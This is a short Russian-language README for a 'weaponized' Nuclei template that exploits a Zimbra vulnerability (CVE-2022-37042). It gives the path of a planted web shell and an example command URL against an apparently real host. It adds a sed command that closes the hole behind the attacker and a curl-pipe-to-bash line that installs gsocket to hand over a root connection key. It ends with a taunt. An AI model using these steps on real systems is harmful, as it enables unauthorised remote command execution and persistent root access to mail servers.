
Zimbra CVE-2022-37042 Nuclei weaponized template
путь к shell: /public/formatter.jsp
Сам Nuclei: https://github.com/projectdiscovery/nuclei
в shell есть скрытое поле ввода с нулевой непрозрачностью, поэтому просто наведите мышь, введите команду и нажмите клавишу [Enter]:
пример URL shell:
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id
выполните эту команду (только один раз):
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
требуется дополнительный код для серверов не с Nginx, а с Apache. Приветствуются pull request'ы.
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1
эта команда установит global-socket (https://www.gsocket.io/deploy/) и передаст вам ключ для подключения от root.
с днём рождения, резня, ублюдки ;)